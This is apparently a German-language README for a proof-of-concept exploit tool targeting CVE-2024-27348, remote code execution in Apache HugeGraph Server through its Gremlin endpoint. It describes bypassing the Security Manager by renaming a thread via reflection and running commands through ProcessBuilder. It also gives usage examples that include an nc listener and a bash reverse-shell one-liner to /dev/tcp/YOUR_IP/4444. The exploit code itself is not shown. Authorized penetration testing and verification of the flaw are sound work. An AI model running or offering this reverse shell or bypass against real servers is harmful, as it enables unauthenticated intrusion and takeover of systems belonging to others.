
Fortgeschrittener PoC-Exploit für CVE-2024-27348, der zuverlässige RCE in Apache HugeGraph über Sandbox-Bypass und nicht-blinde Befehlsausführung erreicht.
Ein fortschrittlicher, hochzuverlässiger Proof-of-Concept-Exploit (PoC) für CVE-2024-27348 (Remote Code Execution in Apache HugeGraph Server).
Im Gegensatz zu vielen öffentlichen PoCs, die Befehle blind ausführen oder aufgrund der Einschränkungen von Java Runtime.exec() bei komplexen Payloads scheitern, ist dieses Skript auf Zuverlässigkeit in realen Penetrationstest-Szenarien ausgelegt.
Nur für Bildungs- und autorisierte Testzwecke. Dieses Tool wird Sicherheitsforschern, Penetrationstestern und Systemadministratoren zur Verfügung gestellt, um die Schwachstelle in autorisierten Umgebungen zu verifizieren. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Dieser Exploit verbessert frühe öffentliche PoCs, indem er drei kritische Probleme adressiert:
gremlin-server-exec-* oder task-worker-* heißt. Dieser Payload nutzt Java-Reflection, um den Ausführungsthread vor dem Auslösen des Payloads dynamisch in BypassThread umzubenennen und so den Security Manager nahtlos zu umgehen.Runtime.getRuntime().exec(String), das bei komplexen Bash-Befehlen (wie Reverse Shells) an Leerzeichen scheitert, verwendet dieser Exploit ProcessBuilder mit einer korrekt formatierten List<String>. Dies ermöglicht die sichere Ausführung komplexer Payloads mit Anführungszeichen und Umleitungen.InputStream des ausgeführten Prozesses mit einem Java-Scanner und gibt die tatsächliche Ausgabe des Befehls in der JSON-HTTP-Antwort zurück. Sie sehen genau das, was der Server sieht.requests-BibliothekInstallieren Sie die erforderlichen Abhängigkeiten:
pip3 install requests
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
Beispiele
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
# On your attacker machine, start a listener:
nc -lvnp 4444
# Execute the exploit:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Apache HugeGraph Server stellt einen Gremlin-API-Endpunkt (/gremlin) bereit, über den Benutzer Groovy-Skripte einreichen können. Aufgrund unzureichender Sandboxing in Versionen vor dem Patch kann ein nicht authentifizierter Angreifer über Java-Reflection beliebige Betriebssystembefehle ausführen.